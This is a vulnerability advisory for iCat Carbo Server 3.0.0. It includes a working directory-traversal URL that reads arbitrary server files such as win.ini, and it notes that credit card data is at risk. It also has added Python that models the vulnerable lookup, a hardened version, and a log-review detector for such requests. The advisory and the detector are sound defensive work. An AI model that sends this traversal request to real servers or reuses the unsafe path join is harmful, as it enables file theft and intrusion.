COMMAND

    iCat Server

SYSTEMS AFFECTED

    Systems running iCat Suite version 3.0

PROBLEM

    iCat Carbo Server is a program used to create interactive shopping
    catalogs for the www. It was selected by PC Magazine's editors  as
    the best Web storefront creation software.

    Mikael Johansson found a bug in the iCat Carbo Server Version 3.0.0.
    The bug lets anyone view any file on a system that is running Carbo
    (except for files whose names contain certain special characters).
    See for yourselves...

        http request:
        http://host/carbo.dll?icatcommand=file_to_view&catalogname=catalog

        http answer:
        [iCat Carbo Server (ISAPI, Release) Version 3.0.0 Release Build 244]

        Error: (-1007) cannot open file 'C:\web\carbohome\file_to_view.htm'

    To view the server's c:\winnt\win.ini:

        http://host/carbo.dll?icatcommand=..\..\winnt\win.ini&catalogname=catalog

    As you can imagine, this bug is rather dangerous.  For example, an
    evil hacker could steal credit card information from users who have
    bought something at a site using Carbo Server 3.0.0.
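
    The lookup behaviour behind this bug, modelled as an added example
    (this is not iCat's code; carbo.dll's internals are not known, so the
    join-then-open behaviour is inferred from the error message above and
    the ".htm" suffix is left out of the model).  The hardened lookup
    confines the resolved path to the catalog home, and the log helper
    flags carbo.dll requests whose icatcommand would escape it.  Windows
    path rules are simulated with ntpath so the code runs on any platform.

```python
"""Added example, not iCat's code: a file lookup that joins an untrusted
icatcommand onto the catalog home directory (the traversal described on
this page) beside a hardened lookup, plus a helper for reviewing request
logs.  Windows path semantics are simulated with ntpath.  The '.htm'
suffix carbo.dll appends is omitted from this model (assumption)."""
import ntpath
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Directory named in the error message on the page.
CARBO_HOME = r"C:\web\carbohome"


def unsafe_resolve(home: str, command: str) -> str:
    # Models the vulnerable behaviour: the request parameter is glued onto
    # the home directory and the result is opened as-is, so '..' segments
    # walk out of the catalog directory.
    return ntpath.normpath(ntpath.join(home, command))


def safe_resolve(home: str, command: str) -> Optional[str]:
    """Return the file to serve, or None if the request escapes `home`."""
    # Reject drive letters and absolute paths outright; ntpath.join would
    # otherwise discard `home` for such input.
    if ntpath.isabs(command) or ntpath.splitdrive(command)[0]:
        return None
    # Canonicalise first, then require the result to stay strictly below
    # `home` (case-insensitive, as the Windows filesystem is).
    base = ntpath.normpath(home)
    target = ntpath.normpath(ntpath.join(home, command))
    prefix = ntpath.normcase(base) + ntpath.sep
    return target if ntpath.normcase(target).startswith(prefix) else None


def icatcommand_from_url(url: str) -> str:
    # Extract the icatcommand query parameter from a carbo.dll request URL.
    return parse_qs(urlsplit(url).query).get("icatcommand", [""])[0]


def is_traversal_request(url: str) -> bool:
    """Log-review helper: True for carbo.dll requests whose icatcommand
    would resolve outside the catalog home directory."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith("carbo.dll"):
        return False
    command = icatcommand_from_url(url)
    return bool(command) and safe_resolve(CARBO_HOME, command) is None
```

    Run is_traversal_request over the URL column of the web server's
    request log to find attempts matching the request shown above.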

SOLUTION

    No matter how good it is, it's still buggy.  For now, stay away from
    it.  It surely will be fixed soon.